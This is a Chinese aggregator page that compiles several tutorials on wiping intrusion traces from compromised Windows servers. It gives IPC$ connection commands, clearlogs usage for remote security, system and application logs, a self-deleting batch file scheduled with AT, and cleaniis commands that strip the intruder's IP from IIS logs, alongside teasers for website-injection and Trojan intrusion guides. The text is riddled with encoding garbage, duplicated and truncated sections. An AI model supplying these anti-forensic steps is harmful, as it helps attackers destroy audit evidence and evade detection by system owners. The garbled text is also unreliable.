下面是小編整理的手把手教你如何清理入侵痕跡���,歡迎大家閱讀借鑒����,并有積極分享���。如果這9篇文章還不能滿足您的需求���,您還可以在本站搜索到更多與手把手教你如何清理入侵痕跡相關(guān)的文章。
(資料圖片僅供參考)
篇1: 手把手教你如何清理入侵痕跡
入侵后的三個重要痕跡分別是:應(yīng)用程序日志�����、安全日志 和系統(tǒng)日志����,
手把手教你如何清理入侵痕跡
。 以下日志在注冊表里的鍵: 應(yīng)用程序日志��,安全日志���,系統(tǒng)日志���,DNS服務(wù)器日志 DNS日志默認位置:%systemroot%system32config�����,默認文件大小512KB,管理員都會改變這個默認大?0踩日志文
篇2:手把手教你入侵
手把手教你入侵
����,
很入侵之后做的事情。 需要的工具: 很好的: radmin.EⅩE 掃描工具: retinarpcdcom.EⅩE 溢出攻擊工具:RpcDcom(通用溢出工具) 腳本開啟telnet工具:telnet.vbe opentelnet.EⅩE resumetelnet.E
篇3: 入侵后的痕跡清理
����。安全日志文件 復(fù)制內(nèi)容到剪貼板 代碼:%systemroot%\system32\config\SecEvent.EVT
系統(tǒng)日志文件 復(fù)制內(nèi)容到剪貼板 代碼:%systemroot%\system32\config\SysEvent.EVT
應(yīng)用程序日志文件 復(fù)制內(nèi)容到剪貼板 代碼:%systemroot%\system32\config\AppEvent.EVT
FTP日志默認位置 復(fù)制內(nèi)容到剪貼板 代碼:%systemroot%\system32\logfiles\msftpsvc1\,默認每天一個
WWW日志默認位置 復(fù)制內(nèi)容到剪貼板 代碼:%systemroot%\system32\logfiles\w3svc1\
默認每天一個日志
以上日志在注冊表里的鍵: 應(yīng)用程序日志���,安全日志�,系統(tǒng)日志���,DNS服務(wù)器日志����,
它們這些LOG文件在注冊表中的: 復(fù)制內(nèi)容到剪貼板 代碼:HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Eventlog
鑰匙(表示成功)和鎖(表示當(dāng)用戶在做什么時被系統(tǒng)停止)���。接連四個鎖圖標(biāo)�����,表示四次失敗審核��,事件類型是帳戶登錄和登錄���、注銷失敗
怎樣刪除這些日志: 通過上面��,得知日志文件通常有某項服務(wù)在后臺保護���,除了系統(tǒng)日志、安全日志��、應(yīng)用程序日志等等���,它們的服務(wù)是Wind
os的關(guān)鍵進程��,而且與注冊表文件在一塊�,當(dāng)Windows2000啟動后��,啟動服務(wù)來保護這些文件��,所以很難刪除.
下面就是很難的安全日志和系統(tǒng)日志了����,守護這些日志的服務(wù)是Event Log�����,試著停掉它! 復(fù)制內(nèi)容到剪貼板 代碼:D:\SERVER\system32\LogFiles\W3SVC1>net sto
p eventlog 這項服務(wù)無法接受請求的“暫?��!?或“停止” 操作�。
怎么清除系統(tǒng)日志.
怎么利用工具清除IIS日志
怎么清除歷史和cookie
怎么察看防火墻Blackice的日志
netstat -an 表示的什么意思
===================================
1.系統(tǒng)日志 通過手工很難清除. 這里我們介紹一個工具 clearlog.exe
使用方法: 復(fù)制內(nèi)容到剪貼板 代碼:Usage: clearlogs [\\computername] <-app / -sec / -sys>
-app = 應(yīng)用程序日志
-sec = 安全日志
-sys = 系統(tǒng)日志
a. 可以清除遠程計算機的日志
** 先用ipc連接上去: 復(fù)制內(nèi)容到剪貼板 代碼:net use \\ip\ipc$ 密碼/user:用戶名
** 然后開始清除: 方法 復(fù)制內(nèi)容到剪貼板 代碼:clearlogs \\ip -app
這個是清除遠程計算機的應(yīng)用程序日志 復(fù)制內(nèi)容到剪貼板 代碼:clearlogs \\ip -sec 這個是清除遠程計算機的安全日志
復(fù)制內(nèi)容到剪貼板 代碼:clearlogs \\ip -sys 這個是清除遠程計算機的系統(tǒng)日志
b.清除本機日志: 如果和遠程計算機的不能空連接. 那么就需要把這個工具傳到遠程計算機上面
然后清除. 方法: 復(fù)制內(nèi)容到剪貼板 代碼:clearlogs -app
這個是清除遠程計算機的應(yīng)用程序日志 復(fù)制內(nèi)容到剪貼板 代碼:clearlogs -sec
這個是清除遠程計算機的安全日志 復(fù)制內(nèi)容到剪貼板 代碼:clearlogs -sys
這個是清除遠程計算機的系統(tǒng)日志
安全日志已經(jīng)被清除.Success: The log has been cleared 成功.
為了更安全一點.同樣你也可以建立一個批處理文件.讓自動清除. 做好批處理文件.然后用at命令建立一個計劃任務(wù). 讓自動運行. 之后你就可以
離開你的肉雞了.
例如建立一個 c.bat 復(fù)制內(nèi)容到剪貼板 代碼:rem ============================== 開始
@echo off
clearlogs -app
clearlogs -sec
clearlogs -sys
del clearlogs.exe
del c.bat
exit
rem ============================== 結(jié)束
在你的計算機上面測試的時候 可以不要 @echo off 可以顯示出來. 你可以看到結(jié)果
第一行表示: 運行時不顯示窗口
第二行表示: 清除應(yīng)用程序日志
第三行表示: 清除安全日志
第四行表示: 清除系統(tǒng)日志
第五行表示: 刪除 clearlogs.exe 這個工具
第六行表示: 刪除 c.bat 這個批處理文件
第七行表示: 退出
用AT命令. 建立一個計劃任務(wù). 這個命令在原來的教程里面和雜志里面都有. 你可以去看看詳細的使用方法
AT 時間 c:\c.bat
之后你就可以安全離開了. 這樣才更安全一點.
===================================
2.清除iis日志:
工具:cleaniis.exe
使用方法: 復(fù)制內(nèi)容到剪貼板 代碼:iisantidote
iisantidote stop
stop opiton will stop iis before clearing the files and restart it after
exemple : c:\winnt\system32\logfiles\w3svc1\ dont forget the \
使用方法解釋:
cleaniis.exe iis日志存放的路徑 清除參數(shù)
什么意思呢��?�����?我來給大家舉個例子吧: 復(fù)制內(nèi)容到剪貼板 代碼:cleaniis c:\winnt\system32\logfiles\w3svc1\ 192.168.0.1
這個表示清除log中所有此IP(192.168.0.1)地址的訪問記錄. -----推薦使用這種方法 復(fù)制內(nèi)容到剪貼板 代碼:cleaniis c:\winnt\system32\logfiles\w3svc1\ /shop/admin/
這個表示清除這個目錄里面的所以的日志 復(fù)制內(nèi)容到剪貼板 代碼:c:\winnt\system32\logfiles\w3svc1
代表是iis日志的位置(windows nt/2000) 這個路徑可以改變 復(fù)制內(nèi)容到剪貼板 代碼:c:\windows\system32\logfiles\w3svc1
代表是iis日志的位置(windows xp/) 這個路徑可以改變
這個測試表示 在日志里面沒有這個ip地址.
我們看一下日志的路徑 再來看一下
我們的ip(192.168.0.1)已經(jīng)沒有了.
已經(jīng)全部清空.
同樣這個也可以建立批處理. 方法同上面的那個.
===================================
3.清除歷史記錄及運行的日志:
cleaner.exe
直接運行就可以了.
===================================
4.察看blackice的日志.
這個地方我們可以清除的看到 防火墻的日志.
這個表示 有人發(fā)過來帶有病毒的email附件. ip是: 220.184.153.116
tcp_probe_other 表示 通過tcp 掃描 或者利用別的和你建立連接 通信
這個表示通過端口 80 掃描iis
病毒 nimda
這里需要很多的計算機協(xié)議知識. 同時也需要對英語有了解
才能更好的分析 如果對英語不好 你可以裝一個金山詞霸.
一般情況下 我們可以 對一些可以不用管.
一般這三種情況 不用去管.
最上面的 critical 這個 可以去關(guān)注一下 . 一般是確實有別的計算機掃描或者入侵你的計算機
count 代表次數(shù) intruder 是對方的ip event 是通過什么方式(協(xié)議) 掃描或者想入侵的
time表示時間
篇4:手把手教你入侵網(wǎng)站 菜鳥必看
說到入侵網(wǎng)站����,最常見的就漏洞注入攻擊了,很多網(wǎng)站都具有這樣的漏洞�����,
手把手教你入侵網(wǎng)站 菜鳥必看
����,
注入漏洞也是最有效也是最簡單的入侵網(wǎng)站的途徑�����。網(wǎng)絡(luò)安全就是網(wǎng)絡(luò)攻防的一個過程���,知道如何攻的才能知道如何防守。下面筆者就自己的親身經(jīng)歷給大家介紹一下網(wǎng)站漏洞注入攻擊��。 先說一下
篇5:手把手教你入侵個人計算機 菜鳥必讀
這道快餐是專門為從來沒有通過 網(wǎng)絡(luò) 進入過對方 計算機 的網(wǎng)絡(luò) 新手 們準(zhǔn)備的��,主要使用的 軟件 就是著名的國產(chǎn) 木馬 冰河2.2�����,所以���,如果你已經(jīng)使用過冰河2.2��,就不必跟著我們往下走了�����,
手把手教你入侵個人計算機 菜鳥必讀
�,
其他有興趣的網(wǎng)絡(luò)新手們���,Let"s go����! 第一步 下載必備的 工具 軟件。1
篇6:教你如何清理電腦上網(wǎng)痕跡
1自定義刪除(即想刪除哪條歷史記錄就刪除哪條)
在百度搜索網(wǎng)頁里的搜索欄中����,點擊鼠標(biāo)左鍵兩次����,會出現(xiàn)以前搜索過的歷史記錄,然后用鼠標(biāo)指向你想要刪除的歷史記錄(注意:是指向���,不要點擊)��,這時這條歷史記錄會深色顯示�,再點擊DEL鍵�����,就可以刪除這一條歷史記錄了���。這種方法你可以隨心所欲�����,想刪哪條都可以����。
2完全刪除法
在桌面用鼠標(biāo)右鍵點擊IE圖標(biāo),再點屬性�����。選上面的“內(nèi)容”按鈕��。再點下面的“自動完成”按鈕���。然后點擊“清除表單”��,就可以把以前的所有歷史記錄刪掉����,
如果想以后也把錄用的內(nèi)容不留歷史記錄����,則把“表單”前面的勾去掉。
3用修復(fù)工具�����,比如上網(wǎng)助手..
刪除搜索框中的歷史記錄
如何清除搜索框內(nèi)的搜索歷史記錄?
答:這是網(wǎng)頁瀏覽器的一項功能�。進入IE瀏覽器的相關(guān)菜單選項設(shè)置:
?如果您使用IE4.0瀏覽器�����,則由“查看→internet選項→內(nèi)容→自動完成→清除表單→完成”�;
�����?如果您使用IE5.0及以上版本的瀏覽器��,則由“工具→internet選項→內(nèi)容→自動完成→清除表單→完成”�����;
���?如果您希望IE瀏覽器以后不再記錄查詢過的內(nèi)容�����,請在“自動完成”設(shè)置頁面內(nèi)把“表單”前的選項勾去掉����。
篇7:入侵服務(wù)器之后痕跡的清理
來源:刀客城
自己總結(jié)的,也不知道對不對
打開事件管理��,然后在左邊右鍵���,清除所有的��,然后打開C盤���,C:\WINDOWS\system32\LogFiles
目錄下每個文件加內(nèi)有TXT的,刪了���,或打開�����,把的東西修改了�,如果沒法刪��,那就在CMD下輸入
net stop 加目錄名字,但是這里HTTPERR只輸入HTTP�,
入侵服務(wù)器之后痕跡的清理
,
W什么的目錄不加后面的數(shù)字�����,不然出錯��,沒法停止����,然后就可以刪了,下來我們把一個工具放到服務(wù)器上��,
clear3389.exe
百度有��,用法是�,CMD下��,輸入這個軟件的路徑加空格��,加clear3389.exe cleaniislog . 加你的IP就可以了
這樣基本就可以清除了
篇8:入侵后的3個重要痕跡清理
清理你入侵后的三個重要痕跡
應(yīng)用程序日志
安全日志
系統(tǒng)日志
DNS日志默認位置:%systemroot%system32config����,默認文件大小512KB,管理員都會改變這個默認大小,安全日志文件:%systemroot%system32configSecEvent.EVT
系統(tǒng)日志文件:%systemroot%system32configSysEvent.EVT
應(yīng)用程序日志文件:%systemroot%system32configAppEvent.EVT
FTP日志默認位置:%systemroot%system32logfilesmsftpsvc1����,默認每天一個
WWW日志默認位置:%systemroot%system32logfilesw3svc1,默認每天一個日志
以上日志在注冊表里的鍵: 應(yīng)用程序日志�����,安全日志����,系統(tǒng)日志,DNS服務(wù)器日志����,
它們這些LOG文件在注冊表中的:
HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesEventlog
鑰匙(表示成功)和鎖(表示當(dāng)用戶在做什么時被系統(tǒng)停止)。接連四個鎖圖標(biāo)��,表示四次失敗審核��,事件類型是帳戶登錄和登錄注銷失敗
怎樣刪除這些日志: 通過上面���,得知日志文件通常有某項服務(wù)在后臺保護�����,除了系統(tǒng)日志安全日志應(yīng)用程序日志等等����,它們的服務(wù)是Windos的關(guān)鍵進程,而且與注冊表文件在一塊��,當(dāng)Windows2000啟動后��,啟動服務(wù)來保護這些文件����,所以很難刪除.
下面就是很難的安全日志和系統(tǒng)日志了,守護這些日志的服務(wù)是Event Log���,試著停掉它�����! D:SERVERsystem32LogFilesW3SVC1>net stop eventlog 這項服務(wù)無法接受請求的“暫停” 或“停止” 操作��,
怎么清除系統(tǒng)日志.
怎么利用工具清除IIS日志
怎么清除歷史和cookie
怎么察看防火墻 Blackice的日志
netstat -an 表示的什么意思
--------------------------------------------------------------------------------------------------------------
1. 系統(tǒng)日志 通過手工很難清除. 這里我們介紹一個工具 clearlog.exe
使用方法:
Usage: clearlogs [\computername] <-app / -sec / -sys>
-app = 應(yīng)用程序日志
-sec = 安全日志
-sys = 系統(tǒng)日志
a. 可以清除遠程計算機的日志
** 先用ipc連接上去: net use \ipipc$ 密碼/user:用戶名
** 然后開始清除: 方法
clearlogs \ip -app 這個是清除遠程計算機的應(yīng)用程序日志
clearlogs \ip -sec 這個是清除遠程計算機的安全日志
clearlogs \ip -sys 這個是清除遠程計算機的系統(tǒng)日志
b.清除本機日志: 如果和遠程計算機的不能空連接. 那么就需要把這個工具傳到遠程計算機上面
然后清除.??方法:
clearlogs??-app 這個是清除遠程計算機的應(yīng)用程序日志
clearlogs
篇9:教你徹底清除入侵后的重要痕跡
今天�,來教大家清理你入侵后的三個重要痕跡,包括應(yīng)用程序日志�,安全日志,系統(tǒng)日志。
DNS日志默認位置:%systemroot%system32config��,默認文件大小512KB�����,管理員都會改變這個默認大小�。安全日志文件:%systemroot%system32configSecEvent.EVT
系統(tǒng)日志文件:%systemroot%system32configSysEvent.EVT
應(yīng)用程序日志文件:%systemroot%system32configAppEvent.EVT
FTP日志默認位置:%systemroot%system32logfilesmsftpsvc1,默認每天一個
WWW日志默認位置:%systemroot%system32logfilesw3svc1��,默認每天一個日志
以上日志在注冊表里的鍵: 應(yīng)用程序日志�,安全日志,系統(tǒng)日志����,DNS服務(wù)器日志,
它們這些LOG文件在注冊表中的:
HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesEventlog
鑰匙(表示成功)和鎖(表示當(dāng)用戶在做什么時被系統(tǒng)停止)���。接連四個鎖圖標(biāo)�,表示四次失敗審核��,事件類型是帳戶登錄和登錄注銷失敗
怎樣刪除這些日志: 通過上面�����,得知日志文件通常有某項服務(wù)在后臺保護,除了系統(tǒng)日志安全日志應(yīng)用程序日志等等�����,它們的服務(wù)是Windos2000的關(guān)鍵進程�,而且與注冊表文件在一塊,當(dāng)Windows2000啟動后���,啟動服務(wù)來保護這些文件�����,所以很難刪除.
下面就是很難的安全日志和系統(tǒng)日志了����,守護這些日志的服務(wù)是Event Log�,試著停掉它! D:SERVERsystem32LogFilesW3SVC1>net stop eventlog 這項服務(wù)無法接受請求的“暫?�!?或“停止” 操作����。
怎么清除系統(tǒng)日志.
怎么利用工具清除IIS日志
怎么清除歷史和cookie
怎么察看防火墻Blackice的日志
netstat -an 表示的什么意思
--------------------------------------------------------------------------------------------------------------
1.系統(tǒng)日志 通過手工很難清除. 這里我們介紹一個工具 clearlog.exe
使用方法:
Usage: clearlogs [\computername] <-app / -sec / -sys>
-app = 應(yīng)用程序日志
-sec = 安全日志
-sys = 系統(tǒng)日志
a. 可以清除遠程計算機的日志
** 先用ipc連接上去: net use \ipipc$ 密碼/user:用戶名
** 然后開始清除: 方法
clearlogs \ip -app 這個是清除遠程計算機的應(yīng)用程序日志
clearlogs \ip -sec 這個是清除遠程計算機的安全日志
clearlogs \ip -sys 這個是清除遠程計算機的系統(tǒng)日志
b.清除本機日志: 如果和遠程計算機的不能空連接. 那么就需要把這個工具傳到遠程計算機上面
然后清除.??方法:
clearlogs??-app 這個是清除遠程計算機的應(yīng)用程序日志
clearlogs??-sec 這個是清除遠程計算機的安全日志
clearlogs??-sys 這個是清除遠程計算機的系統(tǒng)日志
安全日志已經(jīng)被清除.Success: The log has been cleared??成功.
為了更安全一點.同樣你也可以建立一個批處理文件.讓自動清除. 做好批處理文件.然后用at命令建立一個計劃任務(wù). 讓自動運行. 之后你就可以離開你的肉雞了.
例如建立一個 c.bat
rem ============================== 開始
@echo off
clearlogs -app
clearlogs -sec
clearlogs -sys
del clearlogs.exe
del c.bat
exit
rem ============================== 結(jié)束
在你的計算機上面測試的時候 可以不要 @echo off??可以顯示出來. 你可以看到結(jié)果
第一行表示: 運行時不顯示窗口
第二行表示: 清除應(yīng)用程序日志
第三行表示: 清除安全日志
第四行表示: 清除系統(tǒng)日志
第五行表示: 刪除 clearlogs.exe 這個工具
第六行表示: 刪除 c.bat 這個批處理文件
第七行表示: 退出
用AT命令. 建立一個計劃任務(wù). 這個命令在原來的教程里面和雜志里面都有. 你可以去看看詳細的使用方法
AT 時間 c:c.bat
之后你就可以安全離開了. 這樣才更安全一點.
--------------------------------------------------------------------------------------------------------------
2.清除iis日志:
工具:cleaniis.exe
使用方法:
iisantidote
iisantidote stop
stop opiton will stop iis before clearing the files and restart it after
exemple : c:winntsystem32logfilesw3svc1 dont forget the
使用方法解釋:
cleaniis.exe iis日志存放的路徑 清除參數(shù)
什么意思呢����?���?我來給大家舉個例子吧:
cleaniis c:winntsystem32logfilesw3svc1 192.168.0.1
這個表示清除log中所有此IP(192.168.0.1)地址的訪問記錄.????-----推薦使用這種方法
cleaniis c:winntsystem32logfilesw3svc1 /shop/admin/
這個表示清除這個目錄里面的所以的日志
c:winntsystem32logfilesw3svc1 代表是iis日志的位置(windows nt/2000) 這個路徑可以改變
c:windowssystem32logfilesw3svc1 代表是iis日志的位置(windows xp/2003) 這個路徑可以改變
這個測試表示 在日志里面沒有這個ip地址.
我們看一下日志的路徑????再來看一下
我們的ip(192.168.0.1)已經(jīng)沒有了.
已經(jīng)全部清空. 同樣這個也可以建立批處理. 方法同上面的那個.
★ 教你如何清理電腦上網(wǎng)痕跡
★ 手把手教你如何優(yōu)化簡歷
★ 手把手教你學(xué)文言文斷句
★ 手把手教你給DB2打補丁
★ 6個步驟手把手教你畫眼影
★ 手把手教你打造超酷的勁舞團QQ空間
★ 痕跡記敘文
★ 辦公用房清理自查報告
★ 資產(chǎn)清理會議紀(jì)要
★ 清理辦公用房自查報告
